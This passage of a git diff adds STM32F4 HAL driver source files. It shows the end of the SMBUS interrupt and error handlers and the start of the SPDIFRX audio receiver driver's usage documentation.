SET_BIT(hsmbus->Instance->CR1, I2C_CR1_STOP); + } + + else if ((tmp == 1U) || (tmp == 0U)) + { + /* Disable Acknowledge */ + CLEAR_BIT(hsmbus->Instance->CR1, I2C_CR1_ACK); + + /* Disable EVT, BUF and ERR interrupt */ + __HAL_SMBUS_DISABLE_IT(hsmbus, SMBUS_IT_EVT | SMBUS_IT_BUF | SMBUS_IT_ERR); + + /* Read data from DR */ + (*hsmbus->pBuffPtr++) = hsmbus->Instance->DR; + hsmbus->XferCount--; + + hsmbus->State = HAL_SMBUS_STATE_READY; + hsmbus->PreviousState = SMBUS_STATE_NONE; + hsmbus->Mode = HAL_SMBUS_MODE_NONE; + +#if (USE_HAL_SMBUS_REGISTER_CALLBACKS == 1) + hsmbus->MasterRxCpltCallback(hsmbus); +#else + HAL_SMBUS_MasterRxCpltCallback(hsmbus); +#endif /* USE_HAL_SMBUS_REGISTER_CALLBACKS */ + } + } + + return HAL_OK; +} + +/** + * @brief Handle BTF flag for Master receiver + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for SMBUS module + * @retval HAL status + */ +static HAL_StatusTypeDef SMBUS_MasterReceive_BTF(SMBUS_HandleTypeDef *hsmbus) +{ + /* Declaration of temporary variables to prevent undefined behavior of volatile usage */ + uint32_t CurrentXferOptions = hsmbus->XferOptions; + + if (hsmbus->XferCount == 4U) + { + /* Disable BUF interrupt, this help to treat correctly the last 2 bytes + on BTF subroutine if there is a reception delay between N-1 and N byte */ + __HAL_SMBUS_DISABLE_IT(hsmbus, SMBUS_IT_BUF); + + /* Read data from DR */ + (*hsmbus->pBuffPtr++) = hsmbus->Instance->DR; + hsmbus->XferCount--; + hsmbus->XferPEC = SMBUS_GET_PEC(hsmbus); + } + else if (hsmbus->XferCount == 3U) + { + /* Disable BUF interrupt, this help to treat correctly the last 2 bytes + on BTF subroutine if there is a reception delay between N-1 and N byte */ + __HAL_SMBUS_DISABLE_IT(hsmbus, SMBUS_IT_BUF); + + /* Disable Acknowledge */ + CLEAR_BIT(hsmbus->Instance->CR1, I2C_CR1_ACK); + + /* Read data from DR */ + (*hsmbus->pBuffPtr++) = hsmbus->Instance->DR; + hsmbus->XferCount--; + hsmbus->XferPEC = SMBUS_GET_PEC(hsmbus); + } + else if (hsmbus->XferCount == 2U) + { + /* Prepare next transfer or stop current transfer */ + if ((CurrentXferOptions == SMBUS_NEXT_FRAME) || (CurrentXferOptions == SMBUS_FIRST_FRAME)) + { + /* Disable Acknowledge */ + CLEAR_BIT(hsmbus->Instance->CR1, I2C_CR1_ACK); + + /* Generate ReStart */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_START); + } + else + { + /* Generate Stop */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_STOP); + } + + /* Read data from DR */ + (*hsmbus->pBuffPtr++) = hsmbus->Instance->DR; + hsmbus->XferCount--; + + /* Read data from DR */ + (*hsmbus->pBuffPtr++) = hsmbus->Instance->DR; + hsmbus->XferCount--; + + /* Disable EVT and ERR interrupt */ + __HAL_SMBUS_DISABLE_IT(hsmbus, SMBUS_IT_EVT | SMBUS_IT_ERR); + + hsmbus->State = HAL_SMBUS_STATE_READY; + hsmbus->PreviousState = SMBUS_STATE_NONE; + hsmbus->Mode = HAL_SMBUS_MODE_NONE; +#if (USE_HAL_SMBUS_REGISTER_CALLBACKS == 1) + hsmbus->MasterRxCpltCallback(hsmbus); +#else + HAL_SMBUS_MasterRxCpltCallback(hsmbus); +#endif /* USE_HAL_SMBUS_REGISTER_CALLBACKS */ + } + else + { + /* Read data from DR */ + (*hsmbus->pBuffPtr++) = hsmbus->Instance->DR; + hsmbus->XferCount--; + } + return HAL_OK; +} + +/** + * @brief Handle SB flag for Master + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for SMBUS module + * @retval HAL status + */ +static HAL_StatusTypeDef SMBUS_Master_SB(SMBUS_HandleTypeDef *hsmbus) +{ + if (hsmbus->Init.AddressingMode == SMBUS_ADDRESSINGMODE_7BIT) + { + /* Send slave 7 Bits address */ + if (hsmbus->State == HAL_SMBUS_STATE_BUSY_TX) + { + hsmbus->Instance->DR = SMBUS_7BIT_ADD_WRITE(hsmbus->Devaddress); + } + else + { + hsmbus->Instance->DR = SMBUS_7BIT_ADD_READ(hsmbus->Devaddress); + } + } + else + { + if (hsmbus->EventCount == 0U) + { + /* Send header of slave address */ + hsmbus->Instance->DR = SMBUS_10BIT_HEADER_WRITE(hsmbus->Devaddress); + } + else if (hsmbus->EventCount == 1U) + { + /* Send header of slave address */ + hsmbus->Instance->DR = SMBUS_10BIT_HEADER_READ(hsmbus->Devaddress); + } + } + return HAL_OK; +} + +/** + * @brief Handle ADD10 flag for Master + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for SMBUS module + * @retval HAL status + */ +static HAL_StatusTypeDef SMBUS_Master_ADD10(SMBUS_HandleTypeDef *hsmbus) +{ + /* Send slave address */ + hsmbus->Instance->DR = SMBUS_10BIT_ADDRESS(hsmbus->Devaddress); + + return HAL_OK; +} + +/** + * @brief Handle ADDR flag for Master + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for SMBUS module + * @retval HAL status + */ +static HAL_StatusTypeDef SMBUS_Master_ADDR(SMBUS_HandleTypeDef *hsmbus) +{ + /* Declaration of temporary variable to prevent undefined behavior of volatile usage */ + uint32_t Prev_State = hsmbus->PreviousState; + + if (hsmbus->State == HAL_SMBUS_STATE_BUSY_RX) + { + if ((hsmbus->EventCount == 0U) && (hsmbus->Init.AddressingMode == SMBUS_ADDRESSINGMODE_10BIT)) + { + /* Clear ADDR flag */ + __HAL_SMBUS_CLEAR_ADDRFLAG(hsmbus); + + /* Generate Restart */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_START); + + hsmbus->EventCount++; + } + else + { + /* In the case of the Quick Command, the ADDR flag is cleared and a stop is generated */ + if (hsmbus->XferCount == 0U) + { + /* Clear ADDR flag */ + __HAL_SMBUS_CLEAR_ADDRFLAG(hsmbus); + + /* Generate Stop */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_STOP); + } + else if (hsmbus->XferCount == 1U) + { + /* Prepare next transfer or stop current transfer */ + if ((hsmbus->XferOptions == SMBUS_FIRST_FRAME) && (Prev_State != SMBUS_STATE_MASTER_BUSY_RX)) + { + /* Disable Acknowledge */ + CLEAR_BIT(hsmbus->Instance->CR1, I2C_CR1_ACK); + + /* Clear ADDR flag */ + __HAL_SMBUS_CLEAR_ADDRFLAG(hsmbus); + } + else if ((hsmbus->XferOptions == SMBUS_NEXT_FRAME) && (Prev_State != SMBUS_STATE_MASTER_BUSY_RX)) + { + /* Enable Acknowledge */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_ACK); + + /* Clear ADDR flag */ + __HAL_SMBUS_CLEAR_ADDRFLAG(hsmbus); + } + else + { + /* Disable Acknowledge */ + CLEAR_BIT(hsmbus->Instance->CR1, I2C_CR1_ACK); + + /* Clear ADDR flag */ + __HAL_SMBUS_CLEAR_ADDRFLAG(hsmbus); + + /* Generate Stop */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_STOP); + } + } + else if (hsmbus->XferCount == 2U) + { + if (hsmbus->XferOptions != SMBUS_NEXT_FRAME) + { + /* Disable Acknowledge */ + CLEAR_BIT(hsmbus->Instance->CR1, I2C_CR1_ACK); + + /* Enable Pos */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_POS); + + + } + else + { + /* Enable Acknowledge */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_ACK); + } + + /* Clear ADDR flag */ + __HAL_SMBUS_CLEAR_ADDRFLAG(hsmbus); + } + else + { + /* Enable Acknowledge */ + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_ACK); + + /* Clear ADDR flag */ + __HAL_SMBUS_CLEAR_ADDRFLAG(hsmbus); + } + + /* Reset Event counter */ + hsmbus->EventCount = 0U; + } + } + else + { + /* Clear ADDR flag */ + __HAL_SMBUS_CLEAR_ADDRFLAG(hsmbus); + } + + return HAL_OK; +} + +/** + * @brief Handle TXE flag for Slave + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for SMBUS module + * @retval HAL status + */ +static HAL_StatusTypeDef SMBUS_SlaveTransmit_TXE(SMBUS_HandleTypeDef *hsmbus) +{ + /* Declaration of temporary variables to prevent undefined behavior of volatile usage */ + uint32_t CurrentState = hsmbus->State; + + if (hsmbus->XferCount != 0U) + { + /* Write data to DR */ + hsmbus->Instance->DR = (*hsmbus->pBuffPtr++); + hsmbus->XferCount--; + + if ((hsmbus->XferCount == 2U) && (SMBUS_GET_PEC_MODE(hsmbus) == SMBUS_PEC_ENABLE) && ((hsmbus->XferOptions == SMBUS_FIRST_AND_LAST_FRAME_WITH_PEC) || (hsmbus->XferOptions == SMBUS_LAST_FRAME_WITH_PEC))) + { + hsmbus->XferCount--; + } + + if ((hsmbus->XferCount == 0U) && (CurrentState == (HAL_SMBUS_STATE_BUSY_TX_LISTEN))) + { + /* Last Byte is received, disable Interrupt */ + __HAL_SMBUS_DISABLE_IT(hsmbus, SMBUS_IT_BUF); + + /* Set state at HAL_SMBUS_STATE_LISTEN */ + hsmbus->PreviousState = SMBUS_STATE_SLAVE_BUSY_TX; + hsmbus->State = HAL_SMBUS_STATE_LISTEN; + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_SMBUS_REGISTER_CALLBACKS == 1) + hsmbus->SlaveTxCpltCallback(hsmbus); +#else + HAL_SMBUS_SlaveTxCpltCallback(hsmbus); +#endif /* USE_HAL_SMBUS_REGISTER_CALLBACKS */ + } + } + return HAL_OK; +} + +/** + * @brief Handle BTF flag for Slave transmitter + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for SMBUS module + * @retval HAL status + */ +static HAL_StatusTypeDef SMBUS_SlaveTransmit_BTF(SMBUS_HandleTypeDef *hsmbus) +{ + if (hsmbus->XferCount != 0U) + { + /* Write data to DR */ + hsmbus->Instance->DR = (*hsmbus->pBuffPtr++); + hsmbus->XferCount--; + } + + + + else if ((hsmbus->XferCount == 0U) && (SMBUS_GET_PEC_MODE(hsmbus) == SMBUS_PEC_ENABLE) && ((hsmbus->XferOptions == SMBUS_FIRST_AND_LAST_FRAME_WITH_PEC) || (hsmbus->XferOptions == SMBUS_LAST_FRAME_WITH_PEC))) + { + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_PEC); + } + return HAL_OK; +} + +/** + * @brief Handle RXNE flag for Slave + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for SMBUS module + * @retval HAL status + */ +static HAL_StatusTypeDef SMBUS_SlaveReceive_RXNE(SMBUS_HandleTypeDef *hsmbus) +{ + /* Declaration of temporary variables to prevent undefined behavior of volatile usage */ + uint32_t CurrentState = hsmbus->State; + + if (hsmbus->XferCount != 0U) + { + /* Read data from DR */ + (*hsmbus->pBuffPtr++) = hsmbus->Instance->DR; + hsmbus->XferCount--; + + if ((hsmbus->XferCount == 1U) && (SMBUS_GET_PEC_MODE(hsmbus) == SMBUS_PEC_ENABLE) && ((hsmbus->XferOptions == SMBUS_FIRST_AND_LAST_FRAME_WITH_PEC) || (hsmbus->XferOptions == SMBUS_LAST_FRAME_WITH_PEC))) + { + SET_BIT(hsmbus->Instance->CR1, I2C_CR1_PEC); + hsmbus->XferPEC = SMBUS_GET_PEC(hsmbus); + } + if ((hsmbus->XferCount == 0U) && (CurrentState == HAL_SMBUS_STATE_BUSY_RX_LISTEN)) + { + /* Last Byte is received, disable Interrupt */ + __HAL_SMBUS_DISABLE_IT(hsmbus, SMBUS_IT_BUF); + + /* Set state at HAL_SMBUS_STATE_LISTEN */ + hsmbus->PreviousState = SMBUS_STATE_SLAVE_BUSY_RX; + hsmbus->State = HAL_SMBUS_STATE_LISTEN; + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_SMBUS_REGISTER_CALLBACKS == 1) + hsmbus->SlaveRxCpltCallback(hsmbus); +#else + HAL_SMBUS_SlaveRxCpltCallback(hsmbus); +#endif /* USE_HAL_SMBUS_REGISTER_CALLBACKS */ + } + } + return HAL_OK; +} + +/** + * @brief Handle BTF flag for Slave receiver + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for SMBUS module + * @retval HAL status + */ +static HAL_StatusTypeDef SMBUS_SlaveReceive_BTF(SMBUS_HandleTypeDef *hsmbus) +{ + if (hsmbus->XferCount != 0U) + { + /* Read data from DR */ + (*hsmbus->pBuffPtr++) = hsmbus->Instance->DR; + hsmbus->XferCount--; + } + + return HAL_OK; +} + +/** + * @brief Handle ADD flag for Slave + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for SMBUS module + * @retval HAL status + */ +static HAL_StatusTypeDef SMBUS_Slave_ADDR(SMBUS_HandleTypeDef *hsmbus) +{ + uint8_t TransferDirection = SMBUS_DIRECTION_RECEIVE ; + uint16_t SlaveAddrCode = 0U; + + /* Transfer Direction requested by Master */ + if (__HAL_SMBUS_GET_FLAG(hsmbus, SMBUS_FLAG_TRA) == RESET) + { + TransferDirection = SMBUS_DIRECTION_TRANSMIT; + } + + if (__HAL_SMBUS_GET_FLAG(hsmbus, SMBUS_FLAG_DUALF) == RESET) + { + SlaveAddrCode = hsmbus->Init.OwnAddress1; + } + else + { + SlaveAddrCode = hsmbus->Init.OwnAddress2; + } + + /* Call Slave Addr callback */ +#if (USE_HAL_SMBUS_REGISTER_CALLBACKS == 1) + hsmbus->AddrCallback(hsmbus, TransferDirection, SlaveAddrCode); +#else + HAL_SMBUS_AddrCallback(hsmbus, TransferDirection, SlaveAddrCode); +#endif /* USE_HAL_SMBUS_REGISTER_CALLBACKS */ + + return HAL_OK; +} + +/** + * @brief Handle STOPF flag for Slave + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for SMBUS module + * @retval HAL status + */ +static HAL_StatusTypeDef SMBUS_Slave_STOPF(SMBUS_HandleTypeDef *hsmbus) +{ + /* Declaration of temporary variable to prevent undefined behavior of volatile usage */ + uint32_t CurrentState = hsmbus->State; + + /* Disable EVT, BUF and ERR interrupt */ + __HAL_SMBUS_DISABLE_IT(hsmbus, SMBUS_IT_EVT | SMBUS_IT_BUF | SMBUS_IT_ERR); + + /* Clear STOPF flag */ + __HAL_SMBUS_CLEAR_STOPFLAG(hsmbus); + + /* Disable Acknowledge */ + CLEAR_BIT(hsmbus->Instance->CR1, I2C_CR1_ACK); + + /* All data are not transferred, so set error code accordingly */ + if (hsmbus->XferCount != 0U) + { + /* Store Last receive data if any */ + if (__HAL_SMBUS_GET_FLAG(hsmbus, SMBUS_FLAG_BTF) == SET) + { + /* Read data from DR */ + (*hsmbus->pBuffPtr++) = hsmbus->Instance->DR; + + if (hsmbus->XferCount > 0) + { + hsmbus->XferSize--; + hsmbus->XferCount--; + } + } + + /* Store Last receive data if any */ + if (__HAL_SMBUS_GET_FLAG(hsmbus, SMBUS_FLAG_RXNE) == SET) + { + /* Read data from DR */ + (*hsmbus->pBuffPtr++) = hsmbus->Instance->DR; + + if (hsmbus->XferCount > 0) + { + hsmbus->XferSize--; + hsmbus->XferCount--; + } + } + } + + if (hsmbus->ErrorCode != HAL_SMBUS_ERROR_NONE) + { + /* Call the corresponding callback to inform upper layer of End of Transfer */ + SMBUS_ITError(hsmbus); + } + else + { + if ((CurrentState == HAL_SMBUS_STATE_LISTEN) || (CurrentState == HAL_SMBUS_STATE_BUSY_RX_LISTEN) || \ + (CurrentState == HAL_SMBUS_STATE_BUSY_TX_LISTEN)) + { + hsmbus->XferOptions = SMBUS_NO_OPTION_FRAME; + hsmbus->PreviousState = HAL_SMBUS_STATE_READY; + hsmbus->State = HAL_SMBUS_STATE_READY; + hsmbus->Mode = HAL_SMBUS_MODE_NONE; + +#if (USE_HAL_SMBUS_REGISTER_CALLBACKS == 1) + hsmbus->ListenCpltCallback(hsmbus); +#else + HAL_SMBUS_ListenCpltCallback(hsmbus); +#endif /* USE_HAL_SMBUS_REGISTER_CALLBACKS */ + } + } + return HAL_OK; +} + +/** + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for SMBUS module + * @retval HAL status + */ +static HAL_StatusTypeDef SMBUS_Slave_AF(SMBUS_HandleTypeDef *hsmbus) +{ + /* Declaration of temporary variables to prevent undefined behavior of volatile usage */ + uint32_t CurrentState = hsmbus->State; + uint32_t CurrentXferOptions = hsmbus->XferOptions; + + if (((CurrentXferOptions == SMBUS_FIRST_AND_LAST_FRAME_NO_PEC) || (CurrentXferOptions == SMBUS_FIRST_AND_LAST_FRAME_WITH_PEC) || \ + (CurrentXferOptions == SMBUS_LAST_FRAME_NO_PEC) || (CurrentXferOptions == SMBUS_LAST_FRAME_WITH_PEC)) && \ + (CurrentState == HAL_SMBUS_STATE_LISTEN)) + { + hsmbus->XferOptions = SMBUS_NO_OPTION_FRAME; + + /* Disable EVT, BUF and ERR interrupt */ + __HAL_SMBUS_DISABLE_IT(hsmbus, SMBUS_IT_EVT | SMBUS_IT_BUF | SMBUS_IT_ERR); + + /* Clear AF flag */ + __HAL_SMBUS_CLEAR_FLAG(hsmbus, SMBUS_FLAG_AF); + + /* Disable Acknowledge */ + CLEAR_BIT(hsmbus->Instance->CR1, I2C_CR1_ACK); + + hsmbus->PreviousState = HAL_SMBUS_STATE_READY; + hsmbus->State = HAL_SMBUS_STATE_READY; + hsmbus->Mode = HAL_SMBUS_MODE_NONE; + + /* Call the Listen Complete callback, to inform upper layer of the end of Listen usecase */ +#if (USE_HAL_SMBUS_REGISTER_CALLBACKS == 1) + hsmbus->ListenCpltCallback(hsmbus); +#else + HAL_SMBUS_ListenCpltCallback(hsmbus); +#endif /* USE_HAL_SMBUS_REGISTER_CALLBACKS */ + } + return HAL_OK; +} + + + +/** + * @brief SMBUS interrupts error process + * @param hsmbus SMBUS handle. + * @retval None + */ +static void SMBUS_ITError(SMBUS_HandleTypeDef *hsmbus) +{ + /* Declaration of temporary variable to prevent undefined behavior of volatile usage */ + uint32_t CurrentState = hsmbus->State; + + if ((CurrentState == HAL_SMBUS_STATE_BUSY_TX_LISTEN) || (CurrentState == HAL_SMBUS_STATE_BUSY_RX_LISTEN)) + { + /* keep HAL_SMBUS_STATE_LISTEN */ + hsmbus->PreviousState = SMBUS_STATE_NONE; + hsmbus->State = HAL_SMBUS_STATE_LISTEN; + } + else + { + /* If state is an abort treatment on going, don't change state */ + /* This change will be done later */ + if (hsmbus->State != HAL_SMBUS_STATE_ABORT) + { + hsmbus->State = HAL_SMBUS_STATE_READY; + } + hsmbus->PreviousState = SMBUS_STATE_NONE; + hsmbus->Mode = HAL_SMBUS_MODE_NONE; + } + + /* Disable Pos bit in SMBUS CR1 when error occurred in Master/Mem Receive IT Process */ + CLEAR_BIT(hsmbus->Instance->CR1, I2C_CR1_POS); + + if (hsmbus->State == HAL_SMBUS_STATE_ABORT) + { + hsmbus->State = HAL_SMBUS_STATE_READY; + hsmbus->ErrorCode = HAL_SMBUS_ERROR_NONE; + + /* Store Last receive data if any */ + if (__HAL_SMBUS_GET_FLAG(hsmbus, SMBUS_FLAG_RXNE) == SET) + { + /* Read data from DR */ + (*hsmbus->pBuffPtr++) = hsmbus->Instance->DR; + } + + /* Disable SMBUS peripheral to prevent dummy data in buffer */ + __HAL_SMBUS_DISABLE(hsmbus); + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_SMBUS_REGISTER_CALLBACKS == 1) + hsmbus->AbortCpltCallback(hsmbus); +#else + HAL_SMBUS_AbortCpltCallback(hsmbus); +#endif /* USE_HAL_SMBUS_REGISTER_CALLBACKS */ + } + else + { + /* Store Last receive data if any */ + if (__HAL_SMBUS_GET_FLAG(hsmbus, SMBUS_FLAG_RXNE) == SET) + { + /* Read data from DR */ + (*hsmbus->pBuffPtr++) = hsmbus->Instance->DR; + } + + /* Call user error callback */ +#if (USE_HAL_SMBUS_REGISTER_CALLBACKS == 1) + hsmbus->ErrorCallback(hsmbus); +#else + HAL_SMBUS_ErrorCallback(hsmbus); +#endif /* USE_HAL_SMBUS_REGISTER_CALLBACKS */ + } + /* STOP Flag is not set after a NACK reception */ + /* So may inform upper layer that listen phase is stopped */ + /* during NACK error treatment */ + if ((hsmbus->State == HAL_SMBUS_STATE_LISTEN) && ((hsmbus->ErrorCode & HAL_SMBUS_ERROR_AF) == HAL_SMBUS_ERROR_AF)) + { + hsmbus->XferOptions = SMBUS_NO_OPTION_FRAME; + hsmbus->PreviousState = SMBUS_STATE_NONE; + hsmbus->State = HAL_SMBUS_STATE_READY; + hsmbus->Mode = HAL_SMBUS_MODE_NONE; + + /* Call the Listen Complete callback, to inform upper layer of the end of Listen usecase */ +#if (USE_HAL_SMBUS_REGISTER_CALLBACKS == 1) + hsmbus->ListenCpltCallback(hsmbus); +#else + HAL_SMBUS_ListenCpltCallback(hsmbus); +#endif /* USE_HAL_SMBUS_REGISTER_CALLBACKS */ + } +} + +/** + * @brief This function handles SMBUS Communication Timeout. + * @param hsmbus Pointer to a SMBUS_HandleTypeDef structure that contains + * the configuration information for SMBUS module + * @param Flag specifies the SMBUS flag to check. + * @param Status The new Flag status (SET or RESET). + * @param Timeout Timeout duration + * @param Tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef SMBUS_WaitOnFlagUntilTimeout(SMBUS_HandleTypeDef *hsmbus, uint32_t Flag, FlagStatus Status, uint32_t Timeout, uint32_t Tickstart) +{ + /* Wait until flag is set */ + if (Status == RESET) + { + while (__HAL_SMBUS_GET_FLAG(hsmbus, Flag) == RESET) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if ((Timeout == 0U) || ((HAL_GetTick() - Tickstart) > Timeout)) + { + hsmbus->PreviousState = SMBUS_STATE_NONE; + hsmbus->State = HAL_SMBUS_STATE_READY; + hsmbus->Mode = HAL_SMBUS_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hsmbus); + return HAL_TIMEOUT; + } + } + } + } + return HAL_OK; +} + +/** + * @} + */ + + +#endif /* HAL_SMBUS_MODULE_ENABLED */ + +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_spdifrx.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_spdifrx.c new file mode 100644 index 000000000..50fac5e02 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_spdifrx.c @@ -0,0 +1,1623 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_spdifrx.c + * @author MCD Application Team + * @brief This file provides firmware functions to manage the following + * functionalities of the SPDIFRX audio interface: + * + Initialization and Configuration + * + Data transfers functions + * + DMA transfers management + * + Interrupts and flags management + @verbatim + =============================================================================== + ##### How to use this driver ##### + =============================================================================== + [..] + The SPDIFRX HAL driver can be used as follow: + + (#) Declare SPDIFRX_HandleTypeDef handle structure. + (#) Initialize the SPDIFRX low level resources by implement the HAL_SPDIFRX_MspInit() API: + (##) Enable the SPDIFRX interface clock. + (##) SPDIFRX pins configuration: + (+++) Enable the clock for the SPDIFRX GPIOs. + (+++) Configure these SPDIFRX pins as alternate function pull-up. + (##) NVIC configuration if you need to use interrupt process (HAL_SPDIFRX_ReceiveControlFlow_IT() and HAL_SPDIFRX_ReceiveDataFlow_IT() API's). + (+++) Configure the SPDIFRX interrupt priority. + (+++) Enable the NVIC SPDIFRX IRQ handle. + (##) DMA Configuration if you need to use DMA process (HAL_SPDIFRX_ReceiveDataFlow_DMA() and HAL_SPDIFRX_ReceiveControlFlow_DMA() API's). + (+++) Declare a DMA handle structure for the reception of the Data Flow channel. + (+++) Declare a DMA handle structure for the reception of the Control Flow channel. + (+++) Enable the DMAx interface clock. + (+++) Configure the declared DMA handle structure CtrlRx/DataRx with the required parameters. + (+++) Configure the DMA Channel. + (+++) Associate the initialized DMA handle to the SPDIFRX DMA CtrlRx/DataRx handle. + (+++) Configure the priority and enable the NVIC for the transfer complete interrupt on the + DMA CtrlRx/DataRx channel. + + (#) Program the input selection, re-tries number, wait for activity, channel status selection, data format, stereo mode and masking of user bits + using HAL_SPDIFRX_Init() function. + + -@- The specific SPDIFRX interrupts (RXNE/CSRNE and Error Interrupts) will be managed using the macros + __SPDIFRX_ENABLE_IT() and __SPDIFRX_DISABLE_IT() inside the receive process. + -@- Make sure that ck_spdif clock is configured. + + (#) Three operation modes are available within this driver : + + *** Polling mode for reception operation (for debug purpose) *** + ================================================================ + [..] + (+) Receive data flow in blocking mode using HAL_SPDIFRX_ReceiveDataFlow() + (+) Receive control flow of data in blocking mode using HAL_SPDIFRX_ReceiveControlFlow() + + *** Interrupt mode for reception operation *** + ========================================= + [..] + (+) Receive an amount of data (Data Flow) in non blocking mode using HAL_SPDIFRX_ReceiveDataFlow_IT() + (+) Receive an amount of data (Control Flow) in non blocking mode using HAL_SPDIFRX_ReceiveControlFlow_IT() + (+) At reception end of half transfer HAL_SPDIFRX_RxHalfCpltCallback is executed and user can + add his own code by customization of function pointer HAL_SPDIFRX_RxHalfCpltCallback + (+) At reception end of transfer HAL_SPDIFRX_RxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_SPDIFRX_RxCpltCallback + (+) In case of transfer Error, HAL_SPDIFRX_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_SPDIFRX_ErrorCallback + + *** DMA mode for reception operation *** + ======================================== + [..] + (+) Receive an amount of data (Data Flow) in non blocking mode (DMA) using HAL_SPDIFRX_ReceiveDataFlow_DMA() + (+) Receive an amount of data (Control Flow) in non blocking mode (DMA) using HAL_SPDIFRX_ReceiveControlFlow_DMA() + (+) At reception end of half transfer HAL_SPDIFRX_RxHalfCpltCallback is executed and user can + add his own code by customization of function pointer HAL_SPDIFRX_RxHalfCpltCallback + (+) At reception end of transfer HAL_SPDIFRX_RxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_SPDIFRX_RxCpltCallback + (+) In case of transfer Error, HAL_SPDIFRX_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_SPDIFRX_ErrorCallback + (+) Stop the DMA Transfer using HAL_SPDIFRX_DMAStop() + + *** SPDIFRX HAL driver macros list *** + ============================================= + [..] + Below the list of most used macros in SPDIFRX HAL driver. + (+) __HAL_SPDIFRX_IDLE: Disable the specified SPDIFRX peripheral (IDEL State) + (+) __HAL_SPDIFRX_SYNC: Enable the synchronization state of the specified SPDIFRX peripheral (SYNC State) + (+) __HAL_SPDIFRX_RCV: Enable the receive state of the specified SPDIFRX peripheral (RCV State) + (+) __HAL_SPDIFRX_ENABLE_IT : Enable the specified SPDIFRX interrupts + (+) __HAL_SPDIFRX_DISABLE_IT : Disable the specified SPDIFRX interrupts + (+) __HAL_SPDIFRX_GET_FLAG: Check whether the specified SPDIFRX flag is set or not. + + [..] + (@) You can refer to the SPDIFRX HAL driver header file for more useful macros + + *** Callback registration *** + ============================================= + + The compilation define USE_HAL_SPDIFRX_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + Use HAL_SPDIFRX_RegisterCallback() function to register an interrupt callback. + + The HAL_SPDIFRX_RegisterCallback() function allows to register the following callbacks: + (+) RxHalfCpltCallback : SPDIFRX Data flow half completed callback. + (+) RxCpltCallback : SPDIFRX Data flow completed callback. + (+) CxHalfCpltCallback : SPDIFRX Control flow half completed callback. + (+) CxCpltCallback : SPDIFRX Control flow completed callback. + (+) ErrorCallback : SPDIFRX error callback. + (+) MspInitCallback : SPDIFRX MspInit. + (+) MspDeInitCallback : SPDIFRX MspDeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + Use HAL_SPDIFRX_UnRegisterCallback() function to reset a callback to the default + weak function. + The HAL_SPDIFRX_UnRegisterCallback() function takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset the following callbacks: + (+) RxHalfCpltCallback : SPDIFRX Data flow half completed callback. + (+) RxCpltCallback : SPDIFRX Data flow completed callback. + (+) CxHalfCpltCallback : SPDIFRX Control flow half completed callback. + (+) CxCpltCallback : SPDIFRX Control flow completed callback. + (+) ErrorCallback : SPDIFRX error callback. + (+) MspInitCallback : SPDIFRX MspInit. + (+) MspDeInitCallback : SPDIFRX MspDeInit. + + By default, after the HAL_SPDIFRX_Init() and when the state is HAL_SPDIFRX_STATE_RESET + all callbacks are set to the corresponding weak functions : + HAL_SPDIFRX_RxHalfCpltCallback() , HAL_SPDIFRX_RxCpltCallback(), HAL_SPDIFRX_CxHalfCpltCallback(), + HAL_SPDIFRX_CxCpltCallback() and HAL_SPDIFRX_ErrorCallback() + Exception done for MspInit and MspDeInit functions that are + reset to the legacy weak function in the HAL_SPDIFRX_Init()/ HAL_SPDIFRX_DeInit() only when + these callbacks pointers are NULL (not registered beforehand). + If not, MspInit or MspDeInit callbacks pointers are not null, the HAL_SPDIFRX_Init() / HAL_SPDIFRX_DeInit() + keep and use the user MspInit/MspDeInit functions (registered beforehand) + + Callbacks can be registered/unregistered in HAL_SPDIFRX_STATE_READY state only. + Exception done MspInit/MspDeInit callbacks that can be registered/unregistered + in HAL_SPDIFRX_STATE_READY or HAL_SPDIFRX_STATE_RESET state, + thus registered (user) MspInit/DeInit callbacks can be used during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using HAL_SPDIFRX_RegisterCallback() before calling HAL_SPDIFRX_DeInit() + or 